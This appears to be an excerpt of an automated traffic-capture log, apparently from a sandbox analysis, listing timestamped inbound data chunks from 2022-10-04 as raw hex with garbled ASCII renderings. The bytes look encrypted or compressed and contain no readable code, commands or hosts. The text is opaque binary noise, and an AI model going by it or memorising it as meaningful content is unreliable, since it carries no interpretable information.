                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27720INData Raw: cf 58 a0 89 bd d8 ce 2c f8 eb 17 66 7d 88 87 59 06 8d 14 59 fa 1d e5 1a 5e e3 c2 b8 dc c7 c6 04 21 b6 8d ce 6d 6e fe b5 e0 66 a5 79 df c8 7c e9 44 b2 0e c8 6e f1 1b a6 9a e0 48 f8 47 4f 1f 4c dd 2f bb cf f1 c4 bf f6 d6 02 3c 59 8a 22 50 4e 3a 16 01 0e 11 bf 8b c8 5b 77 5a 01 76 99 09 14 b0 f8 23 55 a8 98 8a 2e 19 b9 4b cd fe b7 e1 ba 92 78 c9 da 6a f4 33 46 82 ff 54 0a 29 2e 37 d4 00 88 c5 d5 2c af 54 3b 13 67 c8 f6 d7 52 f2 c4 28 25 2b 93 fa 07 cd 18 10 86 fa 1c 07 e4 9a 73 72 36 9a c8 5e 65 24 3b a4 d2 6e cb 4b 61 5d bc b7 37 ec 40 e4 a5 9e e8 c7 30 b1 87 7b bf 42 fa b6 78 c4 e3 9c fe 6c 5e 99 d0 69 d8 db f9 d8 3e 25 28 32 10 d7 a1 59 19 d6 23 e5 90 f2 b9 4f 2e 79 21 66 a8 7c 1d e7 a1 1c 87 ca 29 1d 60 c6 52 16 55 5c 0a 27 f4 6f f4 f5 96 b8 c8 40 68 7f
                                                                                                                                                                                                                                    Data Ascii: X,f}YY^!mnfy|DnHGOL/<Y"PN:[wZv#U.Kxj3FT).7,T;gR(%+sr6^e$;nKa]7@0{Bxl^i>%(2Y#O.y!f|)`RU\'o@h
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27736INData Raw: 56 66 dc be 4e 23 08 63 5b 96 80 28 34 7e 8c 4e 02 d2 72 f4 af 9a bc 89 f7 09 0c d3 5a fd 3b 92 bf 78 85 99 64 fa 80 45 19 e6 a7 ea 3d 1b 9c 25 53 d6 9b 54 e9 de d2 6b 20 a9 d3 8d 5a f9 3e 13 bd 13 c5 2d b3 bb a4 d6 cc 1c f7 cb d5 43 63 77 71 ce bc b0 a8 a4 ff b7 5e 03 ca b4 e2 6c 17 24 02 94 f3 b3 15 ce 3f 65 89 cb e3 b9 b0 57 59 ce b3 60 77 1d 1a 8f d9 ac 53 1b b5 ff ce e2 cb b6 aa 27 b0 e1 4b ad 50 1e df 90 de b7 90 01 c3 1b e7 d0 e0 5a fd 05 f5 4d fc 7d 66 68 26 34 6a 92 e8 a3 36 6c b2 32 51 f6 ca 47 f4 61 8a e9 fc 92 36 01 a3 71 47 40 6b 7b 86 8a 4d 90 18 23 7e 51 cf 4e f4 1e 6e 78 13 62 dc 46 44 b5 ff 46 be 2f 1e f4 99 a5 ad 99 db 97 83 c2 79 0a ae 84 f7 54 3b 42 fe 2f 1f 21 be d1 91 ce 1d 06 f8 0c 84 d9 f2 bd 85 e0 03 92 7a 54 84 c6 55 d3 3e 91 3e
                                                                                                                                                                                                                                    Data Ascii: VfN#c[(4~NrZ;xdE=%STk Z>-Ccwq^l$?eWY`wS'KPZM}fh&4j6l2QGa6qG@k{M#~QNnxbFDF/yT;B/!zTU>>
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27752INData Raw: 20 94 d7 6e 78 66 ba 92 38 7b bf 0c fe ba 0d dc e0 af 71 d8 b5 4e bc 6c 30 08 0a 07 98 fe 53 28 e6 f6 55 d4 25 f9 10 99 e4 65 33 76 49 da e9 1d 4c ad 32 c6 78 fb 4f 31 2a 93 43 00 4c ab a5 e0 a9 bb ef d1 ee 0d 95 fa df 31 86 f8 f7 35 f7 d0 fe 8a 27 f0 d6 b6 2f 70 ac 09 9d d1 2d 70 72 4d da b3 ba 59 d4 bb 65 a5 20 43 31 67 40 91 d3 f1 9c fc 6d 40 70 0a fb ee c8 a4 5b 90 37 11 b2 3f b8 29 d9 47 7e 8e 6c f0 4b 33 ed 43 ed 4c ca 45 ad 31 3b f8 90 d6 21 e5 d7 5b f5 4b ea 4b 49 47 f3 e4 95 fb c2 49 40 b3 7a 3c e2 98 ef fc c3 cf aa 2c 80 2b fe d6 ed aa 46 81 27 95 46 f0 c0 e0 75 9f 2f 76 23 c4 21 76 4b 50 07 26 14 79 a8 f4 fb f0 5a db 1b c0 ff ba 0e 82 44 1f 8e 11 52 5e 85 70 47 2e dd 64 cb 0f 93 b9 ed 3c bc 48 49 79 f1 f4 27 f2 3f 0d f7 9a bd 4d 40 88 fb cf c8
                                                                                                                                                                                                                                    Data Ascii: nxf8{qNl0S(U%e3vIL2xO1*CL15'/p-prMYe C1g@m@p[7?)G~lK3CLE1;![KKIGI@z<,+F'Fu/v#!vKP&yZDR^pG.d<HIy'?M@
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27768INData Raw: fc a1 93 ce 37 60 b5 22 bc 02 bc 66 9e ca b9 32 e3 9e 40 04 df 96 83 8d 1d d8 80 a6 e0 18 49 2a dc 6d 7a 99 41 8c ce 8a 74 b4 19 05 8e a7 a1 51 14 d9 c7 34 7f 7b a3 ed ba 89 23 3f 90 96 76 98 c1 73 2f 7f 9a 4a 18 d5 55 76 44 0b 4b c4 6e b1 aa d5 f9 26 76 56 62 cd b9 15 97 f8 c9 71 16 2a 22 2a 3f f6 85 1c ad ee e0 52 fd f7 cc b8 11 bf 5f 30 6c dc 07 fc 6a 6d 69 cc 5b 91 f0 41 39 57 bb 9e 08 25 2b 39 a4 bd 09 71 8b ea ec 73 26 d3 20 44 27 55 d6 d3 0b 5a 4c 4d 63 e1 b3 04 9a e8 e5 c4 5a ac dd 37 58 de 20 58 54 6b 95 ef bd f5 58 11 6b 2e f0 74 76 90 57 e7 9e f5 71 c3 c0 38 ed 7b 90 ee 2f d9 01 c5 ed 8a d2 15 04 e1 ca 80 13 08 1f fb 3d b8 b6 0f 66 66 82 0f fb dd cc a2 f3 88 dc a7 e2 23 9b 09 a6 9e 33 61 9d 28 91 e3 13 8f ce 99 9b 54 05 90 6f 5f c5 45 f9 3a db
                                                                                                                                                                                                                                    Data Ascii: 7`"f2@I*mzAtQ4{#?vs/JUvDKn&vVbq*"*?R_0ljmi[A9W%+9qs& D'UZLMcZ7X XTkXk.tvWq8{/=ff#3a(To_E:
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27784INData Raw: be 8f 95 25 66 f1 80 c8 9d 90 25 cc 16 65 4b e2 d7 b8 da b1 dd ee ae 58 69 86 ef a1 c5 0f 63 ac 76 0e 5d d6 69 84 d9 e3 df 5f 76 08 4c 8a ef 6f 4e 13 2b 3b 60 ce 8f 55 24 17 02 0a 4e 2d b4 4f 73 43 a3 0b 10 66 72 32 33 05 fd 8f 2d 25 76 69 a7 45 3e c1 7c a1 6e 20 0c c2 45 08 81 8d 31 d9 60 39 b7 3b 30 83 56 dc db de 53 c5 4b be d8 7a 29 13 37 d2 98 79 d7 55 e4 2f 39 5e 4e 9f 1d 4a 48 70 8e a0 98 4b d2 4a 05 93 3e de 8e bc d9 ce 2c 44 01 1d e9 90 8f 15 9b d4 69 ef 19 b8 cd a5 f5 96 72 7d b8 ba 59 f5 00 64 c8 8b a5 e8 9e 78 ab ab b2 e3 54 92 64 04 46 87 fd 66 ad 31 6f 04 d1 89 45 6e 38 01 de 59 e1 6a b0 bf 9f 4d 1f 2a 47 a9 a8 5a e8 db 88 d2 6f 0f da 50 9f d5 8c 82 8d 22 b5 38 83 2e 94 1b 07 14 e2 12 9f 53 f7 aa a3 0d 16 d8 89 11 7f ac a4 fd 9d 15 2d 99 eb
                                                                                                                                                                                                                                    Data Ascii: %f%eKXicv]i_vLoN+;`U$N-OsCfr23-%viE>|n E1`9;0VSKz)7yU/9^NJHpKJ>,Dir}YdxTdFf1oEn8YjM*GZoP"8.S-
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27800INData Raw: 89 94 82 f5 38 e4 40 ff ec 16 78 28 02 5c 98 15 b8 71 bb a6 a1 a2 fe 76 fd 36 29 f7 21 ba 40 2d aa 7f a5 20 e0 31 3d 86 34 c4 ea ba 1b 85 ac 32 e3 5d 9d 80 8f 78 6f a4 7b b7 1b e9 05 42 53 b9 f5 14 b6 8e 4f 84 8f 9c 32 13 84 ad 02 2b 68 55 a3 ac 17 7b 32 65 b7 f6 1a 28 2c 7e c4 2c c6 b6 8d 85 cc f9 2a f5 7b 03 30 22 ce 44 6b 1e 7a 86 91 69 e9 a9 83 f2 da a5 28 a6 b5 c4 d4 dc d9 12 ff 8c 06 7d 2f 0f b6 74 a9 cd 07 6c 72 61 a7 04 b6 53 23 98 66 2c b6 c5 80 d7 80 48 5b a0 aa e1 9b b5 89 96 a9 22 da 78 d9 99 a3 b1 e4 12 83 8e a1 90 88 0d 9e 08 e2 ae c5 64 9c 50 93 bc 46 79 7c ad 8b 8a a6 e2 c5 57 89 37 41 30 f6 f5 6c dd 2c 6d d1 cf 84 83 f4 60 9b f6 2c 75 6e 72 4d 25 4a 45 be 29 c8 f0 3a ac dc 59 d8 f3 83 ab 3a b6 01 59 8e 57 4f 90 00 57 95 8c 23 b1 48 f1 99
                                                                                                                                                                                                                                    Data Ascii: 8@x(\qv6)!@- 1=42]xo{BSO2+hU{2e(,~,*{0"Dkzi(}/tlraS#f,H["xdPFy|W7A0l,m`,unrM%JE):Y:YWOW#H
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27816INData Raw: a5 43 e7 f4 99 0d a2 e0 b3 67 cc 3c b8 9b f4 21 9b 53 a9 98 7e 8f 46 7e af 8a ec 55 2c 00 4c ed 0d ce 67 ac 9e 8a 72 45 96 b5 52 1d 77 cd 90 5a e0 cf b0 4c da 21 91 ff d4 cf 6e a1 48 ad b5 e4 7a be f9 86 d8 87 a0 a3 00 e8 64 09 05 d4 03 75 d6 8a 86 7f 7d 4d ff 5c 75 c8 49 47 c4 ca 25 de f6 e1 e4 bc d8 3f 78 0c cb e8 34 43 0f 1f 89 96 67 91 83 5f bb 47 46 cc 73 0f 15 9a ff 2c 95 00 ba dd 0e 62 da c7 f3 fb 8b ab a3 8a 9e e2 f2 64 56 47 7a c4 97 f3 df 09 1d ff 25 48 76 82 17 d5 87 7e 1e 7f 23 ae 7a 10 1b f0 ff e0 a7 f7 8f 6a 03 5c 38 40 38 d6 e1 19 e4 46 dd 88 fe 0c f8 32 cf 28 d5 b6 19 ab 96 d8 eb 5d 3f 99 2f d7 30 21 6a c8 d8 92 55 6d c4 19 cb 20 20 be 37 08 c8 d9 89 cc a3 98 ed 5e 49 79 1a a7 74 6a 9d 94 c5 db 86 29 95 9e f5 b1 a6 b7 3e 49 4c d1 ca 52 73
                                                                                                                                                                                                                                    Data Ascii: Cg<!S~F~U,LgrERwZL!nHzdu}M\uIG%?x4Cg_GFs,bdVGz%Hv~#zj\8@8F2(]?/0!jUm 7^Iytj)>ILRs
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27832INData Raw: 62 6d bd ac eb 9e e3 95 fd 9c f2 b6 2a 84 e9 ba 1c e0 6a 5b b4 bd a3 82 c9 97 19 c1 f2 df 55 ec e4 d5 83 12 8b 81 f1 d4 38 9f 09 3d 88 19 ae 5d f7 47 d1 01 eb 2b 36 9d ed 14 a5 40 42 5e ae 52 e0 e4 fe e1 c0 f7 a3 1d ea 1b 93 5e ad 54 a3 11 47 cb 4a 96 a2 20 64 a9 a8 2d b8 e0 a2 f4 8d 3a ae 69 2d 98 e6 e4 4f 29 fd 9e ab e6 12 14 5c bc 27 30 19 27 ce 28 49 dc 5d 4e 26 86 87 a9 bf dd a9 5f f5 d7 f8 e3 df e9 7b 63 79 f1 8f 84 ea f6 3d 2d 30 bc ef 3c b8 6c d1 8b f8 0d d3 28 3e e6 dd 29 5a da fc bc 4d 90 da 8e 94 21 c8 31 0f 79 ff 8a ab 67 02 e0 3e c5 2e 4e ad 55 e7 99 e8 7a ac ad 6a e7 aa 22 f4 92 7f cf e7 83 03 fe 77 01 87 30 01 0f 74 e5 37 e7 7d d3 30 0c 4a c0 b7 11 af e8 d6 7f 39 41 d8 5f 8f 80 0a 03 8b 0e db 84 17 5b 5a 5c 65 73 cb cc bd ac 1a ee 27 2c 07
                                                                                                                                                                                                                                    Data Ascii: bm*j[U8=]G+6@B^R^TGJ d-:i-O)\'0'(I]N&_{cy=-0<l(>)ZM!1yg>.NUzj"w0t7}0J9A_[Z\es',
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27848INData Raw: 28 f6 ad 2e 83 37 2f 0a 02 0f a1 79 a8 f6 86 05 8b 77 69 a7 a4 6b 8f 5b ed 6d 9b 8e fc 61 a4 d7 08 be 5f bb 24 6d ee 89 de f2 53 57 d5 2a 4d b2 a6 f6 85 da 4d c9 1b a2 84 a4 6a 14 d0 eb d6 e9 49 c6 b1 c8 76 9e 6e 5e 2c a4 d1 00 41 6d 97 a4 55 45 32 c9 16 f8 39 18 02 bc 7f 63 24 ec 30 ae f9 89 6d 80 7d 55 69 4b bb 0c db 07 5f d7 61 2c 33 91 a6 ad 85 9d 67 b4 8d b8 46 bf f9 de d1 58 88 5d a6 b2 b0 ab e0 78 a2 39 bd 9e be 83 28 73 d2 42 8e 6a 3e 46 d0 ce c5 48 5d 1b 72 0d 82 29 fe 3c a7 6b 47 60 cb d2 8a 92 e2 ee 07 a1 73 7b 07 71 ea 8b 62 1b c7 20 e5 8c 02 bb 66 df 73 61 3c 45 58 2f 1c e1 f7 aa 9f 9e 6f b0 87 fa 80 f1 b3 39 1e 47 c8 3e 8a da 76 94 b3 e4 c4 1d 36 76 4e bc 35 ea 30 fb e8 8a 0d ae 18 71 d9 9b 71 09 5a 15 d8 c2 cb 71 23 ce bd 44 1e 98 48 c2 77
                                                                                                                                                                                                                                    Data Ascii: (.7/ywik[ma_$mSW*MMjIvn^,AmUE29c$0m}UiK_a,3gFX]x9(sBj>FH]r)<kG`s{qb fsa<EX/o9G>v6vN50qqZq#DHw
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27864INData Raw: de 7b d3 96 f5 7f 67 55 e9 7e 89 6d 54 18 e8 ea 53 e0 b7 82 7c e6 de 00 85 e6 16 52 7d 25 61 e7 9d 6c f1 8a b9 00 71 0d cd c6 f4 5e 08 6b e2 ed 0b 89 12 76 b0 23 93 e8 f5 1f e2 69 81 a5 f1 ce c7 c7 cc b0 04 d3 b1 d5 4d 26 ea 72 5d 97 22 f1 92 bd 1e b7 52 a2 f3 a2 54 45 8d 89 4f 06 0c a8 36 60 b3 20 a5 16 c7 8a fc a6 dc 1f 0f 19 09 92 17 cf f6 34 7a 4d 71 f9 1e d9 58 41 96 98 44 10 38 18 cf 57 8d 13 f0 bb 66 7a 9f c7 69 9c 54 77 30 8e ed c5 18 26 ea e9 b4 b0 67 73 ea 53 b4 13 1f 16 2b 3f 47 e2 39 e0 50 2b 50 91 87 d4 0d 8e fd a4 6d 80 f9 f2 06 c9 41 d0 9f 09 c1 89 f7 d3 be bb c1 33 03 f9 41 a0 b6 86 9e dc 1a 49 b1 89 5c ec 45 5d db 5a d7 92 d4 bc 29 89 fb 1a 6e 16 9e ce 3f c6 50 b2 08 7b 39 05 63 a5 f3 3f 2d 12 e1 5d b6 7b 59 f4 a9 e3 b6 f3 a2 5a 85 9b b7
                                                                                                                                                                                                                                    Data Ascii: {gU~mTS|R}%alq^kv#iM&r]"RTEO6` 4zMqXAD8WfziTw0&gsS+?G9P+PmA3AI\E]Z)n?P{9c?-]{YZ
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27880INData Raw: a8 ef 82 4b b7 a9 43 87 db bb 31 fe b1 e7 23 ee ce 94 9f 42 56 4e 31 75 7e 7d ea f3 df 25 2c 75 64 62 a4 ce 42 a0 70 c2 a4 dd ca 61 96 89 e5 b5 68 70 d6 17 51 ad f9 80 73 e3 91 40 c5 63 99 03 e5 f7 c1 85 ca 25 53 a9 56 26 e8 15 82 c8 be 66 00 b7 86 4e 4b 38 33 d9 46 d1 87 46 e4 f6 29 a0 de cd 53 0e 40 b8 93 f8 da f9 a7 3f 0a 4f 86 a6 1d 5c fc 7a cb 21 75 52 5e fd 4a 62 c8 bb 40 f2 dd 60 30 f1 fb 08 db 0f c0 5d cf b3 1f d1 22 eb 4b 3f 70 2d e3 41 34 28 a0 09 15 1c 84 a8 dd 6d 52 38 27 48 95 00 ae e2 e2 30 4f 4a 09 a2 55 52 b2 27 4d f0 bc 0c 02 cc c7 d7 a1 69 de dc 54 7e 59 ce bc 52 bf de 8d 3f 88 ea 86 0e 76 5c 5d b2 18 a8 37 ef f9 95 c8 38 6f a3 84 6c 28 0e cb 65 dd 9b c7 57 94 12 77 66 c0 0e 6e 5f 1d 1b 92 f2 33 ef f6 a2 d9 ed b9 92 3a 95 9c d5 73 38 c0
                                                                                                                                                                                                                                    Data Ascii: KC1#BVN1u~}%,udbBpahpQs@c%SV&fNK83FF)S@?O\z!uR^Jb@`0]"K?p-A4(mR8'H0OJUR'MiT~YR?v\]78ol(eWwfn_3:s8
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27896INData Raw: 4c e1 e9 0d 55 bf 82 67 e9 c3 67 47 c5 8a f4 c8 b3 2c 28 3f 03 4f 78 fe 71 a9 e8 44 74 cb f1 69 7a cd 95 01 45 86 2c 96 62 2b 76 1d 80 1c b8 3f 3e 31 65 8e ee 42 e4 fd 44 ff 51 1d 06 9b 29 e2 e8 5c 73 ab 8b d8 fb 24 6a 8c c0 01 40 c2 af 34 bf 95 91 d6 1d 01 cb 45 e2 83 31 87 15 7b dc d7 88 d8 36 e0 72 9c d6 1e 9b dd 17 e7 ee 42 b1 08 46 99 c2 1c e4 8f 6c 76 dc 74 47 45 b4 c2 de 69 12 5a af 42 6b e7 d3 31 8a 96 cb 81 29 04 7f 45 60 f1 7e da c5 e1 63 02 49 42 25 13 18 63 74 46 77 9c 79 16 2b 2d 24 bc a3 2e af 7d 7d ba df ae 1d 00 b4 06 ac b6 48 2d 47 3b 52 5d 33 45 f5 83 28 ef 66 39 eb e0 5f 9e c9 b5 eb 64 1f f5 b2 25 98 a8 1b 55 d5 df ed 3a a6 07 39 76 1b 5e 08 23 d2 5a 23 9e ce 54 c4 16 d8 84 8a 38 e7 12 5e 69 ef 5f 9d 2a 99 cd b3 d2 66 2c aa aa 49 88 53
                                                                                                                                                                                                                                    Data Ascii: LUggG,(?OxqDtizE,b+v?>1eBDQ)\s$j@4E1{6rBFlvtGEiZBk1)E`~cIB%ctFwy+-$.}}H-G;R]3E(f9_d%U:9v^#Z#T8^i_*f,IS
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27912INData Raw: 5a a0 30 de 89 30 21 9e 1b d6 aa a0 c6 63 64 7c 6e 81 86 23 9b 5d 83 f0 46 37 46 f5 0d 7f 68 ae 73 44 0d 06 2a 13 3f 3b 95 7c 53 61 23 61 5b 29 c7 32 e3 a7 cb 26 67 f5 20 67 76 21 82 0a 59 65 77 89 77 02 03 2f b1 3b de 80 f4 f3 4c 86 db 68 08 5b 73 8a e5 66 74 cb 13 ef d4 d9 14 16 e1 c4 60 b5 d6 e4 d7 eb 43 5c fd 63 5d db b4 b7 43 ba 72 26 a9 6f 30 ee 4e 2d 0e f8 2b d9 3e b9 87 e5 b9 44 f3 27 88 2a 95 62 61 ba f1 90 e3 0f f9 62 61 06 6b 81 5e 65 60 37 7e f0 6e e6 90 9c e3 cf 77 59 7c ff 90 3e 53 94 2f 8f 26 30 09 a0 40 33 1a f7 d3 b4 14 23 d2 55 46 6f d8 bd a2 99 47 d1 39 8f 29 e9 99 56 c7 8d 28 78 45 df ef 53 12 73 68 60 09 85 d7 0b 9c 9f 48 0e 7c 5e 93 57 4c 8a 94 1d 3a b0 ce 5e 7a 3a 37 96 f3 e4 9d 69 8c f7 d6 0d b3 07 72 70 bb 75 3c de 5e 56 d3 fe 4d
                                                                                                                                                                                                                                    Data Ascii: Z00!cd|n#]F7FhsD*?;|Sa#a[)2&g gv!Yeww/;Lh[sft`C\c]Cr&o0N-+>D'*babak^e`7~nwY|>S/&0@3#UFoG9)V(xESsh`H|^WL:^z:7irpu<^VM
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27928INData Raw: bd dd 19 e5 e8 52 52 73 a2 b5 42 81 a9 50 f6 54 b0 5c a1 05 03 ff a8 a7 6b 92 ec 7c 3f 40 ce 3b 98 25 c9 66 76 f4 08 43 af 3c e6 ba 17 fa e4 4f 8b df 44 31 3a 6e ed 61 3a b0 17 c9 fc ed 36 f2 81 6f 13 d0 81 ae 8a b4 51 7b 49 59 e5 32 96 be 82 8e e9 71 ca fb 50 64 16 a7 29 72 5d ca 90 12 ec 3f 69 c8 63 a4 5c 94 29 00 7a 1f 7b c1 c7 82 12 33 76 62 d8 02 15 29 87 88 68 7d a8 74 11 b7 cb 96 e4 f7 5f 52 6f da fd 69 66 ed eb e0 95 e7 15 3e 34 e5 5e 88 96 48 4b a0 40 6b ca 6c 87 a0 1a e5 74 5f 41 55 ff 9b 12 f1 34 ee 83 96 08 de 00 86 d2 00 6c 96 d1 98 5c f6 82 c1 7a da a6 f6 c5 f6 b7 b0 8a 80 8d 7a e9 6d 7d 23 1d a8 24 fa 37 a2 f3 f1 9e f9 58 41 51 4e c9 21 ba da 09 b1 5c 2f ae 60 15 c0 e5 ad 3c 58 3c 5c 97 67 08 48 12 45 a7 bb 80 7e 51 18 cb 66 f9 55 26 29 c0
                                                                                                                                                                                                                                    Data Ascii: RRsBPT\k|?@;%fvC<OD1:na:6oQ{IY2qPd)r]?ic\)z{3vb)h}t_Roif>4^HK@klt_AU4l\zzm}#$7XAQN!\/`<X<\gHE~QfU&)
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27944INData Raw: 68 61 94 23 e5 9e 49 23 48 ae 68 9a 47 90 2e 6e bc df dd 64 d2 73 d5 40 d0 21 9c e9 33 01 8c 51 e9 6a 50 74 6a 5e a3 ac b9 80 f1 05 17 50 a0 b3 d6 fd 21 07 b2 ba ea 7c 80 91 e6 8e 54 c0 ab d6 d4 80 2b d9 56 f4 8d 38 83 30 1d ee a2 e9 0f 55 03 55 40 e2 09 c9 18 97 d4 66 f6 b0 4c 53 4e 4a 4e 6b 41 a1 7f 68 84 ed 11 6a d1 8a 25 87 a8 40 76 c2 8f 02 b7 06 7a de fc 59 34 aa 56 9e a3 16 c3 61 23 28 bf ad 60 ea b3 53 e1 3b 02 c3 20 f6 82 bd 30 af 60 d8 8c b1 f2 ad 6d 96 dc b9 be f3 e0 d1 c8 7f 60 34 ba b2 d2 a1 33 62 62 35 ac 3c 83 1a 36 6a c2 c0 af 91 96 1e 03 45 07 1b 28 c4 39 6b 37 6f 8f 91 91 cc e7 4c e8 8b 38 d2 32 59 ef 1a ee 9f f5 2c 24 ab 8d ea e3 84 8e 0e d2 da 4d b4 d9 7d ca b4 99 72 d6 52 96 52 69 21 92 c8 28 58 92 fa 61 90 27 a7 14 15 f7 0c 61 01 c8
                                                                                                                                                                                                                                    Data Ascii: ha#I#HhG.nds@!3QjPtj^P!|T+V80UU@fLSNJNkAhj%@vzY4Va#(`S; 0`m`43bb5<6jE(9k7oL82Y,$M}rRRi!(Xa'a
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27960INData Raw: 2f 1f 64 b0 54 0c e7 b5 c6 43 42 26 d2 71 59 ea c2 82 84 0f 4a d9 3c b3 56 72 f2 70 fe 8e fc e2 4c eb ad f5 9f 9c af 81 4d 8b 1b 58 78 95 ed 9b 0b c0 27 6d e4 0b 38 2c e2 48 96 ba 15 fe 87 6e 4d e9 81 3b 72 46 0d d9 b6 e6 b2 57 74 04 ff 9a 51 49 dd 94 1d a9 4d fb 3c 73 90 bc 18 0c c4 35 d7 a3 a0 43 16 9c 80 4e b5 db cc 36 29 dc 2c 49 51 55 8b 5a a4 4e 74 ae 5b d6 ac eb 8f 8a f6 43 0f f1 13 34 9f 12 4b b6 26 36 b1 5b eb 67 e4 33 e1 c0 92 e3 97 1d 9e 62 21 4a b0 42 dc 17 4e 6d 89 ad 9c f3 f2 ff 18 89 63 3d 33 95 7e ce 1e 85 cd a2 8d f3 6d 1c 5e 5f 02 1f 9d c0 19 17 16 b2 17 9a 2e 9f f1 ab 53 67 fb c5 11 2a d1 b6 7b e9 80 4a 4a 43 68 d3 0a e7 2a b9 e0 c1 e9 cf fd d4 ff b9 ac 82 03 cd 96 d4 a5 cb 01 3c fe 12 b3 51 d6 5d 61 42 c4 43 ab e4 70 b6 cd 9b 15 0d 9d
                                                                                                                                                                                                                                    Data Ascii: /dTCB&qYJ<VrpLMXx'm8,HnM;rFWtQIM<s5CN6),IQUZNt[C4K&6[g3b!JBNmc=3~m^_.Sg*{JJCh*<Q]aBCp
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27976INData Raw: d5 65 76 bb 18 1c eb 8d 19 ee 83 fc ef 56 04 7a 1d b6 29 d9 26 bc 7b 60 c5 96 a2 fa 2b b6 84 a5 8f ac ee c8 8a e0 19 5c 3d 59 d2 6c 54 82 b7 bc ca f4 f5 5b 25 a7 83 e3 c9 86 4f 7e 13 b1 bb 97 fb ca 4d f3 7a 1c 0f f7 c7 db 42 98 76 98 ce 0a d7 88 f3 d9 90 29 af f8 11 ff ae 05 bc 1c 1b 64 a5 79 2e c4 e6 6b 30 b3 cb 37 07 1f 67 e7 e1 f5 71 0e 0a 90 8d 9c 02 8f 27 17 ef f3 1b 8c 2e ec 3c d5 e1 05 59 c2 b5 42 3a 83 2b b7 c4 40 6f ab 36 8b 17 a9 a9 2b 4b 98 2d 55 38 01 0b 6c ad 0f 50 a2 a2 29 26 d1 27 d4 3a 9c 09 1a 9c 41 bc a8 04 0b db 54 8a 96 56 c2 1e bf 33 fb 5c 97 a2 f0 c2 aa 91 be 25 15 59 c5 0a c0 9a 10 d4 f1 ae 8a c1 6a fc b4 f8 3d 32 cc a8 c8 45 aa 31 2d e2 17 98 26 50 58 50 ce 78 c4 a9 13 e2 3b 4c f6 4f 1c d4 0e 45 dc 84 62 6c ba da c0 54 71 67 5c f1
                                                                                                                                                                                                                                    Data Ascii: evVz)&{`+\=YlT[%O~MzBv)dy.k07gq'.<YB:+@o6+K-U8lP)&':ATV3\%Yj=2E1-&PXPx;LOEblTqg\
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC27992INData Raw: bf 4f 25 1a 95 68 97 39 c7 ad 03 97 44 30 2a b8 b9 71 ec a7 14 d8 8a 65 2f 37 ef cf 2a e0 23 e9 27 5e 0c 20 12 e3 c7 a5 53 6e ce 49 1a 8e 70 6a d2 6c 3b b0 67 00 d1 34 6b 8d 5b 31 24 02 e9 52 92 78 88 61 ec 91 7d b6 bd f6 28 e1 21 93 a1 4f 98 61 f2 97 ec a1 84 19 52 7a 5a bc e8 28 fe 95 fd ef 34 94 3e 40 a6 b9 e8 7a 8f f8 a3 38 26 34 00 37 55 d4 56 d6 61 8b 60 50 5a 54 d0 50 2d 0d 74 0f 10 09 8a 8a fe 64 1b 3c dc e5 d5 98 de 0b 0e 2f b4 cc fc 96 71 03 ac a1 1d 45 7f 0b 62 b8 fe 3c e0 45 c3 49 8a 30 ed 73 db 35 dd b4 6c 8f ba 50 ca c7 26 de c3 2d e6 e1 8c a6 9a 53 97 b3 80 3a aa 3e 36 16 62 37 8d 00 40 a3 d9 09 e6 ff 1b d2 99 85 ca 38 36 91 90 39 9c e9 69 29 42 ba d4 be 87 e8 6a 29 de fa 96 04 af d4 af 92 f0 f8 86 43 e6 4f 6a 5a 15 6c c7 3d 0f 6d 72 5b 3c
                                                                                                                                                                                                                                    Data Ascii: O%h9D0*qe/7*#'^ SnIpjl;g4k[1$Rxa}(!OaRzZ(4>@z8&47UVa`PZTP-td</qEb<EI0s5lP&-S:>6b7@869i)Bj)COjZl=mr[<
                                                                                                                                                                                                                                    2022-10-04 05:11:13 UTC28008INData Raw: 28 a4 bc 50 fd 1d 8a 95 92 0f 1f 31 a4 a0 9c 51 ca 4d 00 44 6e 05 b7 c8 97 46 f5 b9 c1 94 4c ab 8b 82 d4 a0 b1 68 e3 18 34 67 d4 79 61 79 92 60 45 1a 37 6e 79 ad eb 6b 5f f9 72 51 a2 f1 0a 61 34 26 0b da 8a a7 fa e0 8f fe 09 0f c9 c6 ca 6a f5 f4 3a f1 45 c4 0d c6 55 72 e5 ae a8 0d 87 00 04 67 37 25 9b 27 17 d6 ac c3 b6 91 82 7d 4d 1e e0 c3 2b 33 cb a7 3e d1 3b ac bf 59 61 7b c6 91 55 f0 f5 bd 3d 65 ba 66 78 87 0b 06 84 92 c9 d9 69 9a 53 bc 21 2f 57 7a e3 e8 d9 59 6e 56 b3 03 aa ac 89 e1 ac 8a ec 3d 92 5c c1 ee 8e 47 7c c5 db 8c 2a 3a fc e2 93 49 e1 02 e6 a4 71 7e 03 9f 73 61 f0 35 1c 05 50 e7 49 6a 6d 29 dc e2 2b 01 61 59 6b 9f 3d e5 2a 9e b3 e7 40 9a b3 70 29 f4 96 f8 66 af 92 9c 0f 0f 28 2b 0a 3c 14 8e be 16 1a de f9 7e eb 0c 9d a8 7e b9 c8 1d af 30 e2
                                                                                                                                                                                                                                    Data Ascii: (P1QMDnFLh4gyay`E7nyk_rQa4&j:EUrg7%'}M+3>;Ya{U=efxiS!/WzYnV=\G|*:Iq~sa5PIjm)+aYk=*@p)f(+<~~0
